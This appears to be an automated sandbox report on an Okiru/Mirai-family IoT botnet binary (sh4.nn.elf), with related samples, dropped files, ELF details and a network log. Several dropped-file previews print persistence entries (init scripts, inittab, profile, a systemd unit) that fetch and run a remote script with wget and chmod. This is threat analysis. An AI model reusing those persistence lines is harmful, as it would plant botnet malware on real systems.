	zerppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
CANONICAL-ASGB	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	91.189.91.42
	boatnet.arc.elf	Get hash	malicious	Mirai	Browse	185.125.190.26
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	arm.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	185.125.190.26
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nklarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	splarm6.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	nabarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	zerppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
AMAZON-02US	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	54.171.230.55
	armv5l.elf	Get hash	malicious	Unknown	Browse	35.163.11.216
	splm68k.elf	Get hash	malicious	Unknown	Browse	3.138.165.134
	nklarm7.elf	Get hash	malicious	Unknown	Browse	3.115.112.216
	splarm7.elf	Get hash	malicious	Unknown	Browse	3.116.167.193
	nklarm5.elf	Get hash	malicious	Unknown	Browse	18.183.83.81
	jklspc.elf	Get hash	malicious	Unknown	Browse	3.110.151.242
	nabspc.elf	Get hash	malicious	Unknown	Browse	54.228.23.120
	splarm.elf	Get hash	malicious	Unknown	Browse	13.251.226.54
	jklm68k.elf	Get hash	malicious	Unknown	Browse	54.118.240.226
INIT7CH	bot.ppc.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	109.202.202.202
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	arm.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	nklarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	nabarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	zerm68k.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	zerarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	armv4eb.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
NETIXBG	mips.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_64.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	sh4.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	94.156.227.234
	arm7.nn-20241224-0051.elf	Get hash	malicious	Mirai, Okiru	Browse	94.156.227.234

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
/etc/init.d/system	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
/etc/init.d/sh4.nn.elf	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse

Created / dropped Files

/boot/bootcmd

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	119
Entropy (8bit):	4.657720481046131
Encrypted:	false
SSDEEP:	3:KPJRXKhiFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRKkfoYZX48bbaaeXCO
MD5:	352020393577339317EBEE4AED36F8BF
SHA1:	CED68ED5C7986138611DD30CC41136CE80F3E397
SHA-256:	B5859A5BF22F0AB879821E4C2C3F95B6A9FC8B229CDE4BEEA07C465C77913A17
SHA-512:	7B247718835A753C6C02D331CBB5DE5FE62D7BFBA213A769F3197A962060089FAD6FB2AD0B07E6C605BF04C2B536FCDD3DA333521691D1103DDF51C9508CF131
Malicious:	false
Reputation:	low
Preview:	run bootcmd_mmc0; /tmp/sh4.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/init.d/sh4.nn.elf

Download File

Process:	/bin/sh
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	395
Entropy (8bit):	4.526047213035463
Encrypted:	false
SSDEEP:	12:QRk/XNxaN2PUJgjvMUFRuKN+dRRucSOyd3:+McIJoYOM3
MD5:	F48DD17432FBE95CA55B2C0006BC9046
SHA1:	5DF733C513CD723F1FA28F3FDE4A27DE2A97E369
SHA-256:	E67B8F595AA3FC551DA51B8971C7294872E6598D9AF61B9F42BF8AF3090D47C0
SHA-512:	81D29DA5DFCF71D13527174BE03BE8C898BC181E2B6A4F67A2D40DFA017C28C7B542370EEB58D87B0A3BC44FB9FE69923020DEA3D6BBB3D94E5FA15758FA204B
Malicious:	true
Joe Sandbox View:	Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh.# /etc/init.d/sh4.nn.elf..case "" in. start). echo 'Starting sh4.nn.elf'. /tmp/sh4.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping sh4.nn.elf'. killall sh4.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start\|stop\|restart}". exit 1. ;;.esac.exit 0.

/etc/init.d/system

Download File

Process:	/tmp/sh4.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	106
Entropy (8bit):	4.627354501209226
Encrypted:	false
SSDEEP:	3:TKH4vZKKhiFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8KkzSXoZX48bzBeLXE0
MD5:	4E8B86A572F983DC08ABDF82E6E12267
SHA1:	67E681B9BF8F26DB26BD4E53575759CB0BD8BCED
SHA-256:	B2D48476DA5C2307C68F833F5E1DDBD62DA6071705C0E28A0B538562F22D34A9
SHA-512:	BC4B612279B03060507571882368A5917FA67045202B2AFAA1782002F3DF324ED8F381D73A833C6FEBBC90B1B279F301B03F755845CE15F83C44D0DB33F9E88C
Malicious:	true
Joe Sandbox View:	Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse Filename: sh4.nn.elf, Detection: malicious, Browse
Reputation:	low
Preview:	#!/bin/sh./tmp/sh4.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.

/etc/inittab

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.583391244844054
Encrypted:	false
SSDEEP:	3:nAWu5IhiFDDoCvLdjX48FIbILbaaFOdFXa5O:AykfoYZX48bbaaeXCO
MD5:	E1166D45D9ED40EB21A7C591F90E419A
SHA1:	DB52F95035ABA87D7CCC4B29E018F28B04EC8067
SHA-256:	BCEB01F80A4F323C56443FC1D08377DB9CE32925668A525A5439B122C9BE4231
SHA-512:	8808997CB246238C3675779D03313C5024E281279E68A8D13651DE64DBDA4EA12802FE1DC0182535FEB9D24EA0BA776E25800D468AF962041606C67043ED5824
Malicious:	false
Reputation:	low
Preview:	::respawn:/tmp/sh4.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.

/etc/motd

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	53
Entropy (8bit):	3.871459242626451
Encrypted:	false
SSDEEP:	3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
MD5:	2BD9B4BE30579E633FC0191AA93DF486
SHA1:	7D63A9BD9662E86666B27C1B50DB8E7370C624FF
SHA-256:	64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
SHA-512:	AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	gorilla botnet is on the device ur not a cat go away.

/etc/profile

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	102
Entropy (8bit):	4.472384332378184
Encrypted:	false
SSDEEP:	3:TgKhiFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgKkzSXoZX48bbaaeXC0
MD5:	47195CB470ACF6E4B1DBE72664993713
SHA1:	4C26B6C09CC2E0D88BDCDF721A224BBAD50688E6
SHA-256:	6EC6B33455644B4BEA142834F4BD6724BE0342BB00C9CAF297FB7DB7C02CE22B
SHA-512:	CF55F81BCABB132E69D2819EAE38F53970DF225E75C19C93CAB795C3ECDCDB0F79204A04850DA166EBB1E3B96CEAD019DBA8AAFF894C33142EC21F7BC0C139C5
Malicious:	true
Preview:	/tmp/sh4.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.

/etc/rc.local

Download File

Process:	/tmp/sh4.nn.elf
File Type:	POSIX shell script, ASCII text executable
Category:	dropped
Size (bytes):	10
Entropy (8bit):	3.121928094887362
Encrypted:	false
SSDEEP:	3:TKH4vn:hv
MD5:	3E2B31C72181B87149FF995E7202C0E3
SHA1:	BD971BEC88149956458A10FC9C5ECB3EB99DD452
SHA-256:	A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
SHA-512:	543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Preview:	#!/bin/sh.

/etc/systemd/system/custom.service

Download File

Process:	/tmp/sh4.nn.elf
File Type:	ASCII text
Category:	dropped
Size (bytes):	300
Entropy (8bit):	5.0656991431492315
Encrypted:	false
SSDEEP:	6:z8ifitRZAMzdK+mO02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+Vp+GWRdtd+GWRXY+GWRuL6
MD5:	59A513CC72AFDE3E897F4C5CDD4DAE49
SHA1:	5CF03D24C8D60A234A71C2DC66DA5273576D1CE3
SHA-256:	AA0631BA912510F7837087EF3C7F2E97D3976D6D2FAC18993C2C30659AFC95F2
SHA-512:	7EB7FFA69570D78ECBCBF11AC81B9667380CA98D72DB40A3F04D0AB17AB24915114A7B6A6A603BCA4D297E515FB64E167FB40445C76E0791085BDEF7FF176258
Malicious:	false
Preview:	[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/sh4.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.

/memfd:snapd-env-generator (deleted)

Download File

Process:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File Type:	ASCII text
Category:	dropped
Size (bytes):	76
Entropy (8bit):	3.7627880354948586
Encrypted:	false
SSDEEP:	3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
MD5:	D86A1F5765F37989EB0EC3837AD13ECC
SHA1:	D749672A734D9DEAFD61DCA501C6929EC431B83E
SHA-256:	85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
SHA-512:	338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
Malicious:	false
Preview:	PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.

/tmp/qemu-open.7ouZ2A (deleted)

Download File

Process:	/tmp/sh4.nn.elf
File Type:	data
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.625
Encrypted:	false
SSDEEP:	3:TgKhiln:TgKEn
MD5:	AA13A1788DEE62AD7B81E381463BF8D7
SHA1:	0E21290B03BAD90EC3B1D5638F84929E822F6AAE
SHA-256:	53D5AB596D45FDDA9C031F87D2CC18EEBF3710689256F65DA7577E20EB59AEEA
SHA-512:	3E78B3236C5696912F507060451E200251009DB6DF3D5CE0CDD4F1108FB600A3FB768C811ED6700D48890651DE1B6A7507AC311F2BAC717C3E9B333BA94E0140
Malicious:	false
Preview:	/tmp/sh4.nn.elf.

Static File Info

General

File type:	ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.949871616445475
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	sh4.nn.elf
File size:	80'764 bytes
MD5:	a77b2146e2cee3edd81794c6dc36cc4f
SHA1:	9a7e1e6b0a404bad276c263c904774e7d3b12a66
SHA256:	98f07d8da535ace7c61c1de942960e763490483c02a811d38b6f59496e05b498
SHA512:	4d75204cb309f01d1a126aad566f5bcf8af0bbf9f32a3b8ef691f48971086c13a630e10d60034ae652169c794762ce2e1f141b5c89185e4448121a78014717c9
SSDEEP:	1536:3jKQimPceMfwNJmx1MFCKUFh17+G68bCgCdzPFo:TxaglU9968bMjFo
TLSH:	FC83AE36C835AD14D09445F8B9B18FB46B93B840954F2FF659AAC7798003EACF21A7F4
File Content Preview:	.ELF.....................@.4....9......4. ...(...............@...@..4...4...............4...4B..4B......&..........Q.td............................././"O.n........#.@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	<unknown>
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x4001a0
Flags:	0x9
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	80324
Section Header Size:	40
Number of Section Headers:	11
Header String Table Index:	10

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x400094	0x94	0x30	0x0	0x6	AX	4
.text	PROGBITS	0x4000e0	0xe0	0x10ee0	0x0	0x6	AX	32
.fini	PROGBITS	0x410fc0	0x10fc0	0x24	0x0	0x6	AX	4
.rodata	PROGBITS	0x410fe4	0x10fe4	0x24bc	0x0	0x2	A	4
.ctors	PROGBITS	0x4234a4	0x134a4	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x4234ac	0x134ac	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x4234b8	0x134b8	0x4b8	0x0	0x3	WA	4
.got	PROGBITS	0x423970	0x13970	0x10	0x4	0x3	WA	4
.bss	NOBITS	0x423980	0x13980	0x2214	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x13980	0x43	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x400000	0x400000	0x134a0	0x134a0	6.9807	0x5	R E	0x10000	.init .text .fini .rodata
LOAD	0x134a4	0x4234a4	0x4234a4	0x4dc	0x26f0	4.6322	0x6	RW	0x10000	.ctors .dtors .data .got .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 06:27:47.684283018 CET	443	33606	54.171.230.55	192.168.2.23
Dec 24, 2024 06:27:47.684540987 CET	33606	443	192.168.2.23	54.171.230.55
Dec 24, 2024 06:27:47.804261923 CET	443	33606	54.171.230.55	192.168.2.23
Dec 24, 2024 06:27:49.691596985 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 06:27:50.131892920 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:50.254532099 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:50.254632950 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:50.254992962 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:50.377330065 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:50.897135973 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:51.057166100 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:51.375127077 CET	38242	60024	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:51.375199080 CET	60024	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:51.901380062 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:52.021193027 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:52.021308899 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:52.021310091 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:52.141268969 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:52.539195061 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:52.705390930 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:53.146752119 CET	38242	60026	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:53.146868944 CET	60026	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:53.683511019 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:53.803334951 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:53.803672075 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:53.803672075 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:53.923356056 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:54.317775965 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:54.485183954 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:54.925055027 CET	38242	60028	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:54.925174952 CET	60028	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:55.318938971 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:55.322774887 CET	42836	443	192.168.2.23	91.189.91.43
Dec 24, 2024 06:27:55.438786030 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:55.438895941 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:55.438895941 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:55.558502913 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:55.943253994 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:56.109302998 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:56.346666098 CET	42516	80	192.168.2.23	109.202.202.202
Dec 24, 2024 06:27:56.568165064 CET	38242	60030	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:56.568233013 CET	60030	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:56.944391966 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:57.064280033 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:57.064397097 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:57.064428091 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:57.184037924 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:57.568494081 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:57.729373932 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:58.187582970 CET	38242	60032	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:58.187653065 CET	60032	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:58.569484949 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:58.692768097 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:58.692848921 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:58.692903042 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:58.813283920 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:59.196835041 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:27:59.361413002 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:59.814290047 CET	38242	60034	94.156.227.234	192.168.2.23
Dec 24, 2024 06:27:59.814405918 CET	60034	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:00.198070049 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:00.318327904 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:00.318402052 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:00.318504095 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:00.438041925 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:00.823007107 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:00.985126019 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:01.431222916 CET	38242	60036	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:01.431313992 CET	60036	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:01.824218988 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:01.944032907 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:01.944145918 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:01.944289923 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:02.063951969 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:02.448551893 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:02.613317966 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:03.059804916 CET	38242	60038	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:03.060025930 CET	60038	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:03.449812889 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:03.569519997 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:03.569595098 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:03.569679976 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:03.689970016 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:04.073970079 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:04.237102985 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:04.691260099 CET	38242	60040	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:04.691329956 CET	60040	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:05.075117111 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:05.194850922 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:05.194935083 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:05.194947958 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:05.314671993 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:05.699615002 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:05.865111113 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:06.318630934 CET	38242	60042	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:06.318713903 CET	60042	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:06.700834036 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:06.820723057 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:06.820807934 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:06.820861101 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:06.940785885 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:07.327177048 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:07.489164114 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:07.956512928 CET	38242	60044	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:07.956595898 CET	60044	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:08.328272104 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:08.449242115 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:08.449337006 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:08.449337006 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:08.569181919 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:08.953078032 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:09.113159895 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:09.567251921 CET	38242	60046	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:09.567326069 CET	60046	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:09.954155922 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:10.073853970 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:10.073977947 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:10.074058056 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:10.193846941 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:10.578926086 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:10.741228104 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:11.192557096 CET	43928	443	192.168.2.23	91.189.91.42
Dec 24, 2024 06:28:11.201646090 CET	38242	60048	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:11.201740980 CET	60048	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:11.579972029 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:11.699815989 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:11.699914932 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:11.699995041 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:11.819626093 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:12.204499006 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:12.369241953 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:12.828454971 CET	38242	60050	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:12.828577042 CET	60050	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:13.205540895 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:13.325562954 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:13.325659990 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:13.325702906 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:13.445611000 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:13.829786062 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:13.997092009 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:14.460300922 CET	38242	60052	94.156.227.234	192.168.2.23
Dec 24, 2024 06:28:14.460385084 CET	60052	38242	192.168.2.23	94.156.227.234
Dec 24, 2024 06:28:14.830955982 CET	60054	38242	192.168.2.23	94.156.227.234
